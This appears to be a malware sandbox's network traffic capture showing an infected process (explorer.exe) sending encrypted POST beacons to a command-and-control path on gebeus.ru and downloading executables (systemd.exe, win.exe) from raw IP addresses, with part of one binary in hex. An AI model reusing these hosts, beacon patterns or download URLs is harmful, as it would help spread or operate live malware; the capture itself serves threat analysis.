                                              Jul 23, 2024 06:15:38.868074894 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://rgmwogluhxcw.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 335
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:15:38.868119955 CEST335OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 78 54 b2 a3
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vuxTMoF9Mt4hT.BJi.UDo,^@zOALXs6X(j51\*H. vgB}7\qu>`J)
                                              Jul 23, 2024 06:15:40.423437119 CEST484INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:15:40 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.54971658.151.148.90801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:15:40.446508884 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://bnbjwqelfrqfgfg.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 266
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:15:40.446522951 CEST266OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 3d 40 ab 9a
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vu=@IkF6Pt1(!+[CwkQYP*wJ<1dpF,{s^U`KtIjE+/+X~AAm`D>"Ad
                                              Jul 23, 2024 06:15:41.965888023 CEST484INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:15:41 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.54971758.151.148.90801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:15:41.981666088 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://ljcfhqrurbdrtnbx.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 137
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:15:41.981666088 CEST137OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 70 38 a6 92
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vup8BXhefIH|CZg^+R
                                              Jul 23, 2024 06:15:43.514889956 CEST189INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:15:43 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb
                                              Data Ascii: #\.\$iDm7&W


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.54971877.221.157.163801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:15:43.529222012 CEST163OUTGET /systemd.exe HTTP/1.1
                                              Connection: Keep-Alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Host: 77.221.157.163


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.54972158.151.148.90801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:16:04.168658972 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://gxlpbwlusmnje.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 112
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:16:04.168658972 CEST112OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 41 58 f8 f4
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vuAXjVSd`=mm0/.X
                                              Jul 23, 2024 06:16:05.693042994 CEST484INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:16:05 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.54972258.151.148.90801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:16:05.701451063 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://ujiloutaffhspsf.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 133
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:16:05.701488018 CEST133OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 60 3a da f2
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vu`:bST@g5)+7BV+"xS<
                                              Jul 23, 2024 06:16:07.614927053 CEST137INHTTP/1.1 200 OK
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:16:07 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.54972358.151.148.90801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:16:07.682085991 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://yfbmduchuitdam.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 140
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:16:07.682118893 CEST140OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 3b 09 fa ea
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vu;[p`_(fM/R]|^TrW3q-~
                                              Jul 23, 2024 06:16:09.163501024 CEST484INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:16:08 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.54972458.151.148.90801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:16:09.173475027 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://jrnqiqvfjjkw.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 318
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:16:09.173475027 CEST318OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 72 54 a2 93
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vurT{S~Ja2hdB97{PUXqK'KVQ.L;SyEt}f/j_b&!5R=byB#)K|S_ f
                                              Jul 23, 2024 06:16:13.255054951 CEST484INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:16:12 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.54972558.151.148.90801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:16:13.262898922 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://vlrfckdhdpbbw.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 187
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:16:13.262932062 CEST187OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 51 0d c6 ea
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vuQfY~cEl"r}R.ll=[_\ExhJ@oRi|M.l3
                                              Jul 23, 2024 06:16:14.764192104 CEST484INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:16:14 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.54972658.151.148.90801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:16:14.772305012 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://qdkcshccmtjsaxfy.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 266
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:16:14.772339106 CEST266OUTData Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 5e 59 d6 8b
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vu^Yn]YGMco?9s4P4^ZS:Z?/iRA)X4GK3XBw4Q3lW|wBw30b|gcGA.
                                              Jul 23, 2024 06:16:16.340675116 CEST185INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:16:16 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2f 5f 24 17 ad 68 44 aa a9 14 bd cf b3 f9 6d 83 27 db b6 26 42 10
                                              Data Ascii: #\/_$hDm'&B


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.54972764.190.113.113801028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 23, 2024 06:16:16.348732948 CEST159OUTGET /win.exe HTTP/1.1
                                              Connection: Keep-Alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Host: 64.190.113.113
                                              Jul 23, 2024 06:16:16.945909023 CEST1236INHTTP/1.1 200 OK
                                              Date: Tue, 23 Jul 2024 04:16:16 GMT
                                              Server: Apache
                                              Last-Modified: Mon, 22 Jul 2024 19:29:34 GMT
                                              ETag: "f1600-61ddb109e6b16"
                                              Accept-Ranges: bytes
                                              Content-Length: 988672
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdos-program
                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 05 00 6c 5a 41 03 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 00 00 00 c0 08 00 00 5c 06 00 00 00 00 00 c0 5a 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 0f 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 78 10 0f 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0f 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEdlZA"\Z@p`xD`X.text `.rdataPL@@.data0 @.CRTP@@.relocX`@B
                                              Jul 23, 2024 06:16:16.946037054 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 57
                                              Data Ascii: AWAVAUATVWUSHH-Xl$(D5QDt$0D$(D$48AcqAqw3A]Uqw3fffff.=#Y=8=|(=/2t=uL$&D$'0GwAE
                                              Jul 23, 2024 06:16:16.946072102 CEST1236INData Raw: d2 0f 44 f7 45 84 c9 0f 44 f7 66 90 81 fe 89 ee d9 12 7f 78 81 fe 3a c2 31 ce 0f 8f fc 00 00 00 81 fe 05 3b ec ae 0f 8f 0c 02 00 00 81 fe 5d 9b 1e 9c 0f 8f d5 03 00 00 81 fe 3b d2 d3 8c 0f 8e 63 07 00 00 81 fe f8 a0 fd 96 0f 8e 29 0c 00 00 81 fe
                                              Data Ascii: DEDfx:1;];c)EC5uD$D$DL$hf|K4@0|:<6.:8:899: L$X
                                              Jul 23, 2024 06:16:16.946326017 CEST1236INData Raw: fb ff ff 81 fe 94 f4 98 0a 0f 8e d5 05 00 00 81 fe 06 5d 3b 0f 0f 8e c8 0a 00 00 81 fe 07 5d 3b 0f 0f 84 3d 13 00 00 81 fe 64 e5 f0 10 0f 84 4b 13 00 00 81 fe e1 5c 3f 11 0f 85 f9 fa ff ff 44 8b 8c 24 f8 00 00 00 44 0f af 8c 24 d0 01 00 00 45 89
                                              Data Ascii: ];];=dK\?D$D$EAE!D$999Tv){*{"}V2~D$D$ D$D$$D$D$(DYAyA=I
